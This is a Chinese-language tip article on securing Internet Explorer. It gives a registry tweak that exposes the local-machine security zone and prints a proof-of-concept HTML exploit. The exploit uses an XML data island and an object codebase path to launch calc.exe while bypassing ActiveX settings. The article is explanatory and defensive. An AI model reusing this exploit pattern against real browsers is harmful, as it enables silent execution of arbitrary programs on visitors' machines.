时间:2019-09-07 15:32:21 作者:Mesa 浏览量:53
图一 IE防黑技巧十则,让你绿色上网更安全《四》
核心提示:针对IE的恶意修改、攻击方法非常多,本文中介绍的十种反黑技巧,一定会对你有所帮助。
针对IE的恶意修改、攻击方法非常多,本文中介绍的十种反黑技巧,一定会对你有所帮助。
下面是具体的方法:打开“开始”菜单中的“运行”,在弹出的“运行”对话框中输入Regedit.exe,打开注册表编辑器,点击前面的“+”号顺次展开到:HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settingsones,在右边窗口中找到DWord值“Flags”,默认键值为十六进制的21(十进制33),双击“Flags”,在弹出的对话框中将它的键值改为“1”即可,关闭注册表编辑器。无需重新启动电脑,重新打开IE,再次点击“工具→Internet选项→安全”标签,你就会看到多了一个“我的电脑”图标,在这里你可以对IE的本地安全进行配置。
图二 IE防黑技巧十则,让你绿色上网更安全《四》
这个小技巧有什么用呢?把下面的代码保存为一个html文件,然后运行试试就知道了:
注意:请把<;替换为向左的尖括号,把>;替换为向右的尖括号。
<;span datasrc=\"#oExec\" datafld=\"exploit\" dataformatas=\"html">;<;/span>;
<;xml id=\"oExec\">;
<;security>;
<;exploit>;
<;![CDATA[
<;object id=\"oFile\"
classid=\"clsid:88888888-8888-8888-8888-888888888888"
codebase=\"c:/winnt/system32/calc.exe">;<;/object>;
]]>;
<;/exploit>;
<;/security>;
<;/xml>;
运行上面的html文件,会打开你的计算机中c:/winnt/system32文件夹下的calc.exe文件!而且IE没有任何提示!即使在IE的安全设置中禁用ActiveX控件上述代码也能工作!如果不是calc.exe文件而是其他恶意文件又会怎么样?如果是在你浏览的网页中含有类似上面的代码又会怎么样?真危险啊!
图三 IE防黑技巧十则,让你绿色上网更安全《四》
之所以会这样是由于IE存在两个可怕的漏洞:可本地执行任意命令,IE的ActiveX安全设置可被绕过。在上述代码中我们给IE指定了一个系统中并不存在的控件号(\"clsid:88888888-8888-8888-8888-888888888888),IE会试图从codebase指定的地址去下载并安装改控件。根据codebase于是IE找到了c:/winnt/system32/calc.exe,接着IE开始“下载”并安装该程序。由于calc.exe是EXE文件,这样就等于是在运行该文件,所以calc.exe就被运行了!